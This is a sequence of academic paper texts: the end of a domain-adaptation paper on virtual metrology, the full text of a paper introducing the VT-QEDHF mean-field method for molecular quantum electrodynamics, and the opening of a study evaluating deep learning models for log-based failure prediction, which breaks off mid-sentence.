CCA(both) & \(0.10\) & \(0.13\) & \(0.12\) & \(0.14\) \\ \hline CCA+CORAL(both) & \(0.07\) & \(0.08\) & \(0.13\) & \(0.13\) \\ \end{tabular} \end{table} Table 3: **VM prediction model performance for CCA based canonical components. Results for VM prediction models that are trained with latent features created via CCA.** Figure 7: **Aligner \(F\) and \(G\) visualizations of 2 times 3 cycled raw sensor measurements of both equipment types in its original form as well as after its bijective mapping. The first graph shows results for source signals and cycled source signals from source to target to source domain. The cycled signals are plotted in red and compared to its original source sensor signals plotted in black. The second graph shows results for target signals and cycled target signals from target to source back to target domain. The cycled signals are plotted in blue and compared to its original target sensor signals plotted in black. 
The x axis shows the timestamps of the sensor signals, y axis the sensor measurement values.** ## Acknowledgment Infineon Technologies AG is gratefully acknowledged for the financial support of this research. The Italian Government PNRR initiatives 'Partenariato 11: Made in Italy ciroclare e sostenibile' and 'Ecosistema dell'Innovazione - iNest' are also gratefully acknowledged for partially financing this research activity.
2310.18228
First-principles molecular quantum electrodynamics theory at all coupling strengths
The ever-growing intersection of quantum electrodynamics (QED) and molecular processes has shown remarkable and unanticipated advancements in altering molecular properties and reactivity by exploiting light-matter couplings. In recent years, multiple ab initio methods have been developed to compute the eigenstates of molecular systems strongly coupled to cavities, ranging from the mean-field to quantum many-body methods. The quantum many-body methods, such as coupled-cluster theories, usually rely on the quality of mean-field reference wavefunctions. Hence, developing efficient and physically reliable mean-field approaches for molecular quantum electrodynamics problems is crucial. The current widely used methods, such as QED Hartree-Fock and the self-consistent counterpart, are limited to specific coupling regimes. In this work, we developed a variational transformation-based molecular quantum electrodynamics mean-field method, namely VT-QEDHF, for light-matter interaction at arbitrary coupling strength. The numerical benchmark demonstrates that the VT-QEDHF method naturally connects both QEDHF and self-consistent QEDHF methods at the two limits, showcasing the advantage of VT-QEDHF across all coupling strengths.
Xinyang Li, Yu Zhang
2023-10-27T16:07:09Z
http://arxiv.org/abs/2310.18228v2
# First-principles molecular quantum electrodynamics theory at all coupling strengths ###### Abstract The ever-growing intersection of quantum electrodynamics (QED) and molecular processes has shown remarkable and unanticipated advancements in altering molecular properties and reactivity by exploiting light-matter couplings. In recent years, multiple ab initio methods have been developed to compute the eigenstates of molecular systems strongly coupled to cavities, ranging from the mean-field to quantum many-body methods. The quantum many-body methods, such as coupled-cluster theories, usually rely on the quality of mean-field reference wavefunctions. Hence, developing efficient and physically reliable mean-field approaches for molecular quantum electrodynamics problems is crucial. The current widely used methods, such as QED Hartree-Fock and the self-consistent counterpart, are limited to specific coupling regimes. In this work, we developed a variational transformation-based molecular quantum electrodynamics mean-field method, namely VT-QEDHF, for light-matter interaction at arbitrary coupling strength. The numerical benchmark demonstrates that the VT-QEDHF method naturally connects both QEDHF and self-consistent QEDHF methods at the two limits, showcasing the advantage of VT-QEDHF across all coupling strengths. ## I Introduction The increasing overlap between quantum electrodynamics (QED) and molecular activities has led to breakthroughs in tailoring molecular properties and activities through light-matter interactions [1; 2; 3]. When strongly coupled, both photons and electrons (or other elementary excitations) within materials become essential and intermingle, with both being equally quantized. In such an environment, the concept of independent "free" particles ceases to exist. Instead, the elementary excitations in the strong light-matter interaction regime are polaritons, which represent a superposition between quantized light and material [4] and display characteristics of both light and matter. Research suggests that material properties can be modulated via these polaritons, engendering a diversity of photophysical and photochemical phenomena; that is, polariton chemistry [1]. Given that the energies of photons and the strength of light-matter interactions can be fine-tuned through cavity manipulations, the robust coupling between light and matter unveils a novel paradigm for modifying material characteristics, with a spectrum of possible applications including lasing [5; 6], long-distance energy transmission [7; 8; 9; 10; 11], Bose-Einstein condensates [12; 13; 14], and various chemical processes [15; 16; 17; 18; 19; 20; 21; 22; 23; 24; 25; 26; 27; 28; 29; 30; 31; 32; 33; 34; 35; 36]. In the thriving field of polariton chemistry (or molecular quantum electrodynamics at large), investigating the influence of arbitrary light-matter coupling strengths on molecular properties and behaviors necessitates a robust and universally applicable theoretical approach [37]. However, the absence of a reliable theoretical framework that seamlessly traverses all coupling regimes hinders the full potential of QED-assisted modulation of molecular properties. Despite significant progress in understanding the effects of confined fields on many molecular characteristics, a comprehensive and first-principles framework for exploring these phenomena across all coupling regimes is still lacking. 
To date, variational theories [38], QED Hartree-Fock (QEDHF) [39; 40], semi-empirical method [41], QED Density Functional Theory (QED-DFT) [42; 43; 44; 45], QED coupled cluster (QED-CC) [3; 46; 47; 3; 48], QED Time-Dependent Density Functional Theory (QED-TDDFT) [48], and Diffusion Quantum Monte Carlo [49] methods have been proposed to study the light-matter interactions. In particular, post-Hartree-Fock methods depend on an optimal mean-field theory (as the reference state) to achieve better accuracy. Although they are effective in addressing several aspects of molecular interactions within quantum fields, the existing QEDHF methods [39] and their self-consistent counterparts [40] are primarily limited to specific coupling strengths. To address this research gap, we introduce a variational transformation [50] based first-principles QED method, referred to as the VT-QEDHF. This universal approach is designed to function effectively across arbitrary coupling strengths, thereby providing an invaluable tool for exploring and understanding light-matter interactions in a more comprehensive and efficient manner. The VT-QEDHF method transcends the limitations of traditional perturbative and strong coupling approaches, offering a more universal perspective on molecular processes in QED environments. Within the VT-QEDHF framework, the photonic field contribution is accounted for in a nonperturbative manner, ensuring the attainment of the exact wave function in the limit of infinite coupling, thereby providing a consistent and reliable molecular orbital description across various coupling regimes. This first-principles approach not only captures the electron-photon correlation (at the mean-field level) effectively but also elucidates the cavity effects on the electronic ground state while maintaining a manageable computational cost. By bridging the theoretical gap across coupling strengths, the VT-QEDHF method is anticipated to open new avenues for the study and manipulation of molecular properties and behaviors within QED environments, offering enriched insights and enhancing the predictability and control over light-matter interactions. ## II Theory The total light-matter Hamiltonian of molecular quantum electrodynamics can be described as the widely used nonrelativistic Pauli-Fierz Hamiltonian in the dipole approximation [2; 3; 51], \[\hat{H}_{\mathrm{PF}}= \hat{H}_{\mathrm{e}}+\sum_{\alpha}\Big{[}\omega_{\alpha}(\hat{a} _{\alpha}^{\dagger}\hat{a}_{\alpha}+\frac{1}{2})\] \[+\sqrt{\frac{\omega_{\alpha}}{2}}\mathbf{\lambda}_{\alpha}\cdot\hat{ \mathbf{D}}(\hat{a}_{\alpha}^{\dagger}+\hat{a}_{\alpha})+\frac{1}{2}(\mathbf{\lambda} _{\alpha}\cdot\hat{\mathbf{D}})^{2}\Big{]}. \tag{1}\] This Hamiltonian is often referred to as the Pauli-Fierz (PF) Hamiltonian. Where \(\hat{H}_{\mathrm{e}}=\hat{T}_{\mathrm{e}}+\hat{V}\) is the bare molecular Hamiltonian (excluding the nuclear kinetic operator) which includes all Coulomb interactions \(\hat{V}\) between electrons and nuclei as well as the electronic kinetic energy operators \(\hat{T}_{\mathrm{e}}\), which is given by the expression, \[\hat{H}_{e}=\sum_{\mu\nu}h_{\mu\nu}\hat{c}_{\mu}^{\dagger}\hat{c}_{\nu}+\frac {1}{2}\sum_{\mu\nu\lambda\sigma}I_{\mu\nu\lambda\sigma}\hat{c}_{\mu}^{\dagger} \hat{c}_{\lambda}^{\dagger}\hat{c}_{\sigma}\hat{c}_{\nu}. \tag{2}\] Where \(h\) and \(I\) are one-electron and two-electron integrals. \(\hat{\mathbf{D}}\) in Eq. 
1 is the molecular dipole operator, \[\hat{\mathbf{D}}=\sum_{i}^{N_{\mathrm{n}}}z_{i}\hat{\mathbf{R}}_{i}-\sum_{i}^{N_{ \mathrm{e}}}e\hat{\mathbf{r}}_{i}\equiv\hat{\mathbf{D}}_{n}+\hat{\mathbf{D}}_{e}, \tag{3}\] including electronic \(\hat{\mathbf{D}}_{e}\) and nuclear \(\hat{\mathbf{D}}_{n}\) components. \(\mathbf{\lambda}_{\alpha}=\sqrt{\frac{1}{\epsilon_{0}V}}\mathbf{e}_{\alpha}\equiv \lambda_{\alpha}\mathbf{e}_{\alpha}\) characterizes the coupling between the molecule and the quantized cavity field. \(\omega_{\alpha}\) and \(\mathbf{e}_{\alpha}\) represent the frequency and polarization of the electric field of cavity photon mode \(\alpha\). The last term describes the dipole self-energy (DSE), which is essential to ensure that the Hamiltonian is bounded from below and displays the correct scaling with the system size [52]. The eigenstate of the molecular QED Hamiltonian can be readily obtained by solving the time-independent Schrödinger equation \[\hat{H}_{\mathrm{PF}}\ket{\Psi}=E\ket{\Psi}, \tag{4}\] where \(\ket{\Psi}\) is the correlated electron-photon wavefunction, though the exact solution to the above quantum many-body equation is nontrivial. The mean-field approach is usually the first and fastest method to approximate quantum many-body problems. At the mean-field level, the wavefunction is approximated by \(\ket{\Psi}\approx\ket{\mathrm{HF}}\otimes\ket{0}\), where \(\ket{0}\) denotes the photon vacuum state. Consequently, the total energy can be written as \[E_{\mathrm{tot}}=E_{HF}+\frac{1}{2}\sum_{\alpha}\langle(\mathbf{\lambda}_{\alpha} \cdot\hat{\mathbf{D}})^{2}\rangle, \tag{5}\] where \(E_{HF}\) denotes the electronic HF energy. The DSE contribution to the total energy (second term on the right-hand side of the above equation) can be evaluated via the DSE-mediated one-electron and two-electron integrals (see more details in the Supplementary Materials (SM)). Thus, the corresponding Fock matrix (for computing the density matrix and molecular orbital properties) can be readily derived by taking the partial derivative of the total energy with respect to the density matrix [39; 53]. The resulting QEDHF method (in the Fock state representation) provides an economical way to compute the polariton ground state and can serve as the reference for other post-HF methods. The key drawback of the QEDHF method in the Fock representation is the slow convergence with the Fock state in the strong coupling limit, which can lead to incorrect behavior, such as incorrect origin dependency and frequency dependency [53], making the QEDHF method in the Fock state representation more suitable for weak coupling systems (as the Fock state is the eigenstate of the interaction Hamiltonian in the \(\lambda\to 0\) limit). Such drawbacks can be mitigated with the coherent state (CS) representation [54], \[\ket{z_{\alpha}}\equiv e^{z_{\alpha}\hat{a}_{\alpha}^{\dagger}-z_{\alpha}^{*} \hat{a}_{\alpha}}\ket{0}\equiv\hat{U}(z_{\alpha})\ket{0}, \tag{6}\] where \(z_{\alpha}=-\frac{\langle\mathbf{\lambda}_{\alpha}\cdot\hat{\mathbf{D}}\rangle_{ \mathrm{HF}}}{\sqrt{2\omega_{\alpha}}}\). It is clear from the above equation that a CS is a linear combination of the complete set of Fock states, with coefficients determined by the displacement due to the light-matter coupling strength. The resulting QEDHF in the CS representation [39] thus mitigates the origin-variance problem. However, the molecular orbitals and Fock matrix remain origin-dependent for charged systems [53]. 
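To make the structure of Eq. (1) concrete, the following is a minimal numerical sketch (not part of the original work) that builds a Pauli-Fierz Hamiltonian for an assumed toy system: a two-level electronic model coupled to a single photon mode in a truncated Fock space. All parameter values and matrices are illustrative placeholders, and the coherent-state displacement of Eq. (6) is evaluated using the lowest toy electronic state as a stand-in for the HF reference.

```python
import numpy as np

# Illustrative toy parameters (assumptions, not values from the paper)
omega = 0.5    # photon frequency (a.u.)
lam = 0.1      # coupling strength lambda (a.u.)
nfock = 20     # Fock-space truncation for the photon mode

# Toy electronic Hamiltonian and dipole matrix e.D in a two-state basis
H_e = np.diag([0.0, 0.8])
D = np.array([[0.5, 0.3],
              [0.3, -0.5]])

# Photon annihilation/creation operators in the truncated Fock basis
a = np.diag(np.sqrt(np.arange(1, nfock)), k=1)
ad = a.T
I_ph, I_el = np.eye(nfock), np.eye(2)

# Pauli-Fierz Hamiltonian of Eq. (1):
#   H_e + omega (a^dag a + 1/2) + sqrt(omega/2) lambda (e.D)(a^dag + a) + (lambda^2/2)(e.D)^2
H_pf = (np.kron(H_e, I_ph)
        + omega * np.kron(I_el, ad @ a + 0.5 * I_ph)
        + np.sqrt(omega / 2.0) * lam * np.kron(D, ad + a)
        + 0.5 * lam**2 * np.kron(D @ D, I_ph))

print("toy polariton ground-state energy:", np.linalg.eigvalsh(H_pf)[0])

# Coherent-state displacement of Eq. (6): z = -lambda <e.D>_HF / sqrt(2 omega),
# here approximated with the lowest toy electronic state.
z = -lam * D[0, 0] / np.sqrt(2.0 * omega)
print("coherent-state displacement z:", z)
```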
Only recently, a fully origin-invariant formulation was developed within a self-consistent strong-coupling QEDHF formalism (namely SC-QEDHF). The SC-QEDHF framework is motivated by the fact that, in the infinite coupling limit (i.e., \(\hat{H}_{e}\ll\hat{H}_{\mathrm{p}}+\hat{H}_{\mathrm{ep}}\) or \(\lambda_{\alpha}\rightarrow\infty\)), the Hamiltonian is dominated by the photon and electron-photon interaction terms, and the corresponding wavefunction can be well approximated by a Gaussian state, \[\ket{\Psi^{\infty}}=e^{-\sum_{\alpha}\frac{\lambda_{\alpha}}{\sqrt{2\omega_{ \alpha}}}\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}-\hat{a}_{\alpha}^{ \dagger})}\ket{\mathrm{HF},0}\equiv\hat{U}_{\lambda}\ket{\mathrm{HF},0}. \tag{7}\] This is widely recognized as the polaron transformation within the context of electron-phonon interaction scenarios [55; 56; 57]. This approach has recently been adapted for use in polariton chemistry [58; 40; 59]. Consequently, we can employ the \(\hat{U}_{\lambda}\) operator to transform the Hamiltonian into a new frame in which the explicit electron-photon coupling terms are eliminated. In particular, after undergoing the transformation, the electronic and photonic operators become \[\hat{U}_{\lambda}^{\dagger}\hat{c}_{\nu}\hat{U}_{\lambda}= \sum_{\mu}\hat{c}_{\mu}X_{\mu\nu}, \tag{8}\] \[\hat{U}_{\lambda}^{\dagger}\hat{a}_{\alpha}\hat{U}_{\lambda}= \hat{a}_{\alpha}-\frac{\lambda_{\alpha}}{\sqrt{2\omega_{\alpha}}} \mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}, \tag{9}\] where \(X_{\mu\nu}=\exp\left[-\sum_{\alpha}\frac{\lambda_{\alpha}}{\sqrt{2\omega_{ \alpha}}}\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}^{\dagger}-\hat{a}_ {\alpha})\right]|_{\mu\nu}\). Under the polariton transformation, the resulting Hamiltonian then becomes (denoted as \(\hat{H}^{p}\)) \[\hat{H}^{p}=\hat{U}_{\lambda}^{\dagger}\hat{H}_{\text{PF}}\hat{U}_{\lambda}= \hat{U}_{\lambda}^{\dagger}\hat{H}_{e}\hat{U}_{\lambda}+\sum_{\alpha}\omega_{ \alpha}\hat{a}_{\alpha}^{\dagger}\hat{a}_{\alpha}. \tag{10}\] The transformed electronic Hamiltonian \(\tilde{H}_{e}\equiv\hat{U}_{\lambda}^{\dagger}\hat{H}_{e}\hat{U}_{\lambda}\) is formally the same as the original one, with the electronic operators dressed by the \(X\) operator. Since the dipole coupling operator \(\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}\) in the \(X\) operator is not diagonal, it is more convenient to transform the operator into the dipole basis (defined by the eigenstates of the \(\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}\) operator, denoted by the symbols \(p,q,r,s\), with the corresponding eigenvalues denoted as \(\eta_{p}\)). Then, the corresponding QEDHF energies and Fock matrix can be derived. More details can be found in Ref. [40]. To bridge the treatments in the weak and strong coupling limits, here we present a variational transformation-based QEDHF method for the arbitrary coupling regime. The central idea is that, instead of using \(\hat{U}_{\lambda}\), we adopt variational parameters \(f_{\alpha}\) to control the variational transformation \(\hat{U}_{f}\)[60] (also called the Lang-Firsov transformation [61]), \[\hat{U}_{f}=e^{-\sum_{\alpha}\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\mathbf{e} _{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}-\hat{a}_{\alpha}^{\dagger})}, \tag{11}\] which facilitates the search for an optimal mean-field approximation to the cavity QED Hamiltonian. 
Such an idea has previously been used in strong electron/exciton-phonon interactions, including exciton transport [60], polaron formation [62; 63; 64], and dissipative quantum transport [65; 66; 50]. With the variational transformation (VT), the resulting Hamiltonian becomes \[\hat{H}(\{f_{\alpha}\})= \tilde{H}_{e}(\{f_{\alpha}\})+\sum_{\alpha}\omega_{\alpha}\hat{a} _{\alpha}^{\dagger}\hat{a}_{\alpha}\] \[+\sum_{\alpha}\sqrt{\frac{\omega_{\alpha}}{2}}(\Delta\lambda_{ \alpha})\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}^{\dagger}+\hat{a}_{ \alpha})\] \[+\frac{(\Delta\lambda_{\alpha})^{2}}{2}(\mathbf{e}_{\alpha}\cdot\hat{ \mathbf{D}})^{2}, \tag{12}\] where \(\Delta\lambda_{\alpha}=\lambda_{\alpha}-f_{\alpha}\) and the parameters \(f_{\alpha}\) are to be determined variationally. \(\tilde{H}_{e}(\{f_{\alpha}\})\) is the VT-dressed electronic Hamiltonian, in which the original electronic operator becomes \(\hat{U}_{f}^{\dagger}\hat{c}_{\nu}\hat{U}_{f}=\sum_{\mu}\hat{c}_{\mu}X_{\mu\nu}^{f}\), with \(X_{\mu\nu}^{f}=\exp\left[-\sum_{\alpha}\frac{f_{\alpha}}{\sqrt{2\omega_{ \alpha}}}\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}^{\dagger}-\hat{a}_ {\alpha})\right]|_{\mu\nu}\). The detailed derivation can be found in the Supplementary Materials (SM). Compared to the fully transformed polariton Hamiltonian in Eq. 10, the variationally transformed Hamiltonian in Eq. 12 includes a partially dressed electronic Hamiltonian \(\tilde{H}_{e}(\{f_{\alpha}\})\) and residues in the bilinear coupling and DSE terms (controlled by \(f_{\alpha}\)). The last two terms in Eq. 12 are referred to as the residual bilinear coupling and DSE terms, respectively. When \(f_{\alpha}/\lambda_{\alpha}=0\) (or 1), Eq. 12 reduces to the original PF Hamiltonian \(\hat{H}_{\mathrm{PF}}\) or to the fully transformed polariton Hamiltonian \(\hat{H}^{p}\), respectively. It should be noted that the transformed Hamiltonians in Equations 12 and 10 are both exact, as no approximation was made in the transformation. The exact diagonalization of the two Hamiltonians should give the same eigenstates. Applying the mean-field approximation to the wavefunction allows us to define the VT-QEDHF wave function as \[\ket{\Psi}=e^{-\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\mathbf{e}_{\alpha}\cdot \hat{\mathbf{D}}(\hat{a}_{\alpha}-\hat{a}_{\alpha}^{\dagger})}\ket{\text{HF},0} \equiv\hat{U}_{f}\ket{\text{HF},0}. \tag{13}\] In the dipole basis [67], this becomes \[\ket{\Psi}=e^{-\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\sum_{p}\eta_{p}\hat{ c}_{p}^{\dagger}\hat{c}_{p}(a_{\alpha}-a_{\alpha}^{\dagger})}\ket{\text{HF},0}, \tag{14}\] and the transformed electronic operators in the dipole basis are given by \[\hat{U}_{f}^{\dagger}\hat{c}_{p}\hat{U}_{f}=\hat{c}_{p}X_{p}^{f}, \tag{15}\] where \(X_{p}^{f}=\exp\left[-\sum_{\alpha}\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}( \mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}})_{pp}(\hat{a}_{\alpha}^{\dagger}-\hat{a}_{ \alpha})\right]\). 
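As a small numerical illustration of the exactness statement above (again a toy sketch, not part of the original work, and reusing the assumed model Hamiltonian, dipole matrix, and photon operators defined in the earlier sketch), one can apply the unitary \(\hat{U}_f\) of Eq. (11) explicitly and check that the spectrum does not depend on \(f\); only the subsequent mean-field treatment does.

```python
import numpy as np
from scipy.linalg import expm

# Reuses H_pf, D, a, ad, omega, and lam from the toy sketch above.

def transformed_hamiltonian(f):
    """U_f^dag H_PF U_f with U_f = exp(-(f/sqrt(2 omega)) (e.D) x (a - a^dag)), cf. Eq. (11)."""
    generator = -(f / np.sqrt(2.0 * omega)) * np.kron(D, a - ad)  # anti-Hermitian matrix
    U_f = expm(generator)                                          # exactly unitary in the truncated space
    return U_f.conj().T @ H_pf @ U_f

# f = 0 leaves the Pauli-Fierz form untouched and f = lambda gives the fully
# transformed form; the ground-state energy agrees in all cases to numerical precision.
for f in (0.0, 0.5 * lam, lam):
    E0 = np.linalg.eigvalsh(transformed_hamiltonian(f))[0]
    print(f"f/lambda = {f / lam:.1f}: E0 = {E0:.10f}")
```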
Consequently, the VT-QEDHF energy in the dipole basis becomes \[E= \sum_{pq}\tilde{h}_{pq}\rho_{pq}G_{pq}+\frac{1}{2}\sum_{pqrs}\tilde {I}_{pqrs}\left(\rho_{pq}\rho_{rs}-\frac{1}{2}\rho_{ps}\rho_{rq}\right)G_{pqrs} +\frac{f_{\alpha}^{2}}{2}\sum_{p}\rho_{pp}\left[(\mathbf{e}_{\alpha}\cdot\mathbf{D})_{pp }-\eta_{p}\right]^{2}\] \[+\frac{f_{\alpha}^{2}}{2}\sum_{pq}\left(\rho_{pp}\rho_{qq}-\frac{1}{2 }\rho_{pq}\rho_{qp}\right)\left[(\mathbf{e}_{\alpha}\cdot\mathbf{D})_{pp}-\eta_{p} \right]\left[(\mathbf{e}_{\alpha}\cdot\mathbf{D})_{qq}-\eta_{q}\right]+\frac{(\Delta \lambda_{\alpha})^{2}}{2}\bra{\text{HF}}\bra{0}\left(\mathbf{e}_{\alpha}\cdot\hat{ \mathbf{D}}\right)^{2}\ket{\text{HF}}\ket{0}. \tag{16}\] Here, \(\tilde{h}\) and \(\tilde{I}\) represent the one-electron and two-electron integrals in the dipole basis, respectively, \(\rho_{pq}\) is the density matrix, and \(G\) denotes the Franck-Condon factors obtained by integrating out the photonic degrees of freedom from the VT-dressed one-/two-electron integrals (i.e., \(\bra{0}(X^{f})_{p}^{\dagger}X_{q}^{f}\ket{0}\)[50; 56]). The first two terms in Eq. (16) are formally the same as the HF energy of the pure electronic system, but with the one-/two-electron integrals replaced by the VT-dressed ones. The third and fourth terms account for relaxation in the dipole basis set [40]. Finally, the last term in Eq. (16) represents the residual DSE. The explicit form of \(G\) can be found in the Supplementary Material (SM). The corresponding Fock matrix can be derived from the energy derivatives with respect to the density matrix. Moreover, the parameters \(\{f_{\alpha}\}\) can also be optimized during the SCF procedure via the energy derivatives with respect to \(f_{\alpha}\) (i.e., \(\frac{\partial E}{\partial f_{\alpha}}\)). The detailed formulas for the Fock matrix and \(\frac{\partial E}{\partial f_{\alpha}}\), which are used for updating the density matrix and variational parameters, can be found in the SM. Additionally, VT-QEDHF can be augmented with the CS basis set, defined by the residual bilinear coupling as \(z_{\alpha}^{f}\equiv-\frac{f_{\alpha}\langle\mathbf{e}_{\alpha}\cdot\mathbf{D}\rangle }{\sqrt{2\omega_{\alpha}}}=-\frac{f_{\alpha}}{\lambda_{\alpha}}z_{\alpha}\), leading to the effective ansatz \[\ket{\Psi}=e^{-\sum_{\alpha p}\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\eta_{p}\hat{c}_{p}^{\dagger}\hat{c}_{p}(a_{\alpha}-a_{\alpha}^{\dagger})}\hat{U}(z_{\alpha}^{f})\ket{\text{HF}}\ket{0}. \tag{17}\] The resulting formalism is denoted as the VT-QEDHF-CS method. ## III Numerical examples We demonstrate the validity and advantages of the VT-QEDHF method across various coupling strengths using a sample molecule (a C\({}_{2}\)N\({}_{2}\)H\({}_{6}\) isomer, with the STO-3G basis set employed). Configurations of the isomer along the trans-cis pathway are detailed in the Supplementary Material (SM). Figure 1 plots the ground state energy of the C\({}_{2}\)N\({}_{2}\)H\({}_{6}\) molecule obtained with different methods. The VT-QEDHF method with a predefined variational parameter \(f\) (i.e., without optimizing \(f\)) is referred to as the VT-QEDHF(f) method. This method connects naturally to the QEDHF and SC-QEDHF methods at the limits of \(f=0\) and \(f=\lambda\), respectively. The red star in Figure 1 indicates the optimized VT-QEDHF energy, which is the lowest among the VT-QEDHF(f) energies as shown. The optimized \(f\) values for the weaker (Figure 1a) and stronger (Figure 1b) coupling cases are 0.53 and 0.73, respectively. 
These values suggest that stronger couplings necessitate a greater transformation of the Hamiltonian, with the corresponding results more closely aligned with the SC-QEDHF method. Furthermore, the additional optimization of \(f\) does not notably increase the SCF optimization workload. For the calculations in Fig. 1, the SC-QEDHF method reaches convergence after 26 iterations, while the VT-QEDHF method meets the same criteria after 36 iterations, indicating a marginal increase in computational duration. Although the VT-QEDHF method incorporates both VT-dressed and DSE-mediated one-/two-electron integrals, the computation of the VT-dressed one-electron and two-electron integrals predominantly contributes to the bottleneck. This computation must be undertaken in every iteration, which is also the case in the SC-QEDHF method. Consequently, the computational expenses of the VT-QEDHF and SC-QEDHF methods are nearly equivalent. Subsequently, we determined the polariton ground state energies along the trans-cis reaction pathway using the HF and QEDHF methods. These results are depicted in Fig. 2, with the photon frequency and coupling parameter (\(\lambda\)) set at 0.1 and 0.5 au, respectively. Compared with the QEDHF and SC-QEDHF methods, VT-QEDHF captures a larger amount of electron-photon correlation. This leads to reduced ground state energies throughout the reaction pathway, underscoring its reliable performance along the reaction coordinate.
Figure 1: VT-QEDHF energies as a function of the transformation parameter \(f\), showing a natural connection to QEDHF and SC-QEDHF methods at the two limits, i.e., with (\(f=1\), red dot) and without (\(f=0\), purple square) polariton transformation. The photon frequency \(\omega\) is set to 0.5 au. The coupling strengths \(\lambda\) are a) 0.05 and b) 0.5, respectively.
We investigated the optimal variational transformation \(f\) across varying photon frequencies and electron-photon coupling strengths. The LiH molecule is used here to scan a wide parameter space efficiently. These results are illustrated in Fig. 3. As anticipated, varying electron-photon coupling strengths dictate distinct optimal values for \(f\) in the variational transformation. Moreover, \(f\) displays a consistent increase with the electron-photon coupling strength \(\lambda\). As \(\lambda\) tends toward small values, the ratio \(f/\lambda\) gravitates towards zero or a finite value contingent on photon energies. Nevertheless, in the weak coupling scenario where \(\lambda\to 0\), the \(f/\lambda\) ratio remains low, aligning with a minimal (or no) polariton transformation limit. Conversely, the \(f/\lambda\) ratio is near unity in the strong coupling domain, reflecting a comprehensive polariton transformation. Within the intermediate range, the variational transformation culminates with a finite value for \(f/\lambda\). This highlights the imperative nature of the variational transformation across a broad parameter regime to obtain optimal mean-field ground states. ## IV Summary In summary, this study introduces the variational transformation-based electronic structure theory (VT-QEDHF) for molecular QED applications encompassing all ranges of coupling strengths. This methodology adeptly captures the optimal mean-field part of both electron-photon and photon-mediated electron-electron correlations. 
Furthermore, this framework is universally applicable to any fermion-boson interaction, making it suitable for studying the coupling of electrons with other quantized bosonic entities such as plasmons and phonons. As an example, our approach can be extended to the investigation of polaron formation from first principles. While VT-QEDHF is robust across all coupling strengths at the mean-field level, it inherently underestimates both intrinsic and photon-mediated electronic correlations. To address this limitation, our forthcoming research will focus on the integration of VT-QEDHF into QED-CCSD and EOM-CCSD frameworks. Given the superior performance of VT-QEDHF over existing QEDHF and SC-QEDHF methods, we are optimistic that the advanced QED-CC methods augmented with VT-QEDHF [3; 45; 46; 39] will significantly improve correlation energy estimations in all coupling regimes. Additional note: While drafting this manuscript, we became aware of a recent paper that employs similar concepts [68]. However, the variational transformation in Ref. [68] is limited to diagonal terms (of the dipole coupling operator) in the transformation. In contrast, our transformation is more general, and the corresponding elements are evaluated within the dipole basis.
Figure 2: Ground state potential energy surfaces of the C\({}_{2}\)N\({}_{2}\)H\({}_{6}\) isomer calculated from different methods. The photon frequency and coupling strength (\(\lambda\)) are 0.1 and 0.5 au, respectively.
Figure 3: The relationship between optimized variational transformation parameters (\(f/\lambda\)) and photon frequencies, with respect to scaled coupling strengths (\(\lambda/\sqrt{\omega}\)). The parameter \(f/\lambda\) trends towards 0 and 1 in the regimes of weak and strong coupling, respectively.
###### Acknowledgements. We acknowledge support from the US DOE, Office of Science, Basic Energy Sciences, Chemical Sciences, Geosciences, and Biosciences Division under Triad National Security, LLC ("Triad") contract Grant 89233218CNA000001 (FWP: LANLECF7). This research used computational resources provided by the Institutional Computing (IC) Program and the Darwin testbed at Los Alamos National Laboratory (LANL), which is funded by the Computational Systems and Software Environments subprogram of LANL's Advanced Simulation and Computing program. LANL is operated by Triad National Security, LLC, for the National Nuclear Security Administration of the U.S. Department of Energy (Contract No. 89233218CNA000001). **Data availability.** The data supporting this study's findings are available from the corresponding author upon request. **Code availability.** The developed code used for this study is available from the corresponding author upon request.
2303.07230
Systematic Evaluation of Deep Learning Models for Log-based Failure Prediction
With the increasing complexity and scope of software systems, their dependability is crucial. The analysis of log data recorded during system execution can enable engineers to automatically predict failures at run time. Several Machine Learning (ML) techniques, including traditional ML and Deep Learning (DL), have been proposed to automate such tasks. However, current empirical studies are limited in terms of covering all main DL types -- Recurrent Neural Network (RNN), Convolutional Neural network (CNN), and transformer -- as well as examining them on a wide range of diverse datasets. In this paper, we aim to address these issues by systematically investigating the combination of log data embedding strategies and DL types for failure prediction. To that end, we propose a modular architecture to accommodate various configurations of embedding strategies and DL-based encoders. To further investigate how dataset characteristics such as dataset size and failure percentage affect model accuracy, we synthesised 360 datasets, with varying characteristics, for three distinct system behavioral models, based on a systematic and automated generation approach. Using the F1 score metric, our results show that the best overall performing configuration is a CNN-based encoder with Logkey2vec. Additionally, we provide specific dataset conditions, namely a dataset size >350 or a failure percentage >7.5%, under which this configuration demonstrates high accuracy for failure prediction.
Fatemeh Hadadi, Joshua H. Dawes, Donghwan Shin, Domenico Bianculli, Lionel Briand
2023-03-13T16:04:14Z
http://arxiv.org/abs/2303.07230v4
# Systematic Evaluation of Deep Learning Models for Failure Prediction + ###### Abstract With the increasing complexity and scope of software systems, their dependability is crucial. The analysis of log data recorded during system execution can enable engineers to automatically predict failures at run time. Several Machine Learning (ML) techniques, including traditional ML and Deep Learning (DL), have been proposed to automate such tasks. However, current empirical studies are limited in terms of covering all main DL types--Recurrent Neural Network (RNN), Convolutional Neural network (CNN), and transformer--as well as examining them on a wide range of diverse datasets. In this paper, we aim to address these issues by systematically investigating the combination of log data embedding strategies and DL types for failure prediction. To that end, we propose a modular architecture to accommodate various configurations of embedding strategies and DL-based encoders. To further investigate how dataset characteristics such as dataset size and failure percentage affect model accuracy, we synthesised 360 datasets, with varying characteristics, for three distinct system behavioral models, based on a systematic and automated generation approach. Using the F1 score metric, our results show that the best overall performing configuration is a CNN-based encoder with Logkey2vec. Additionally, we provide specific dataset conditions, namely a dataset size 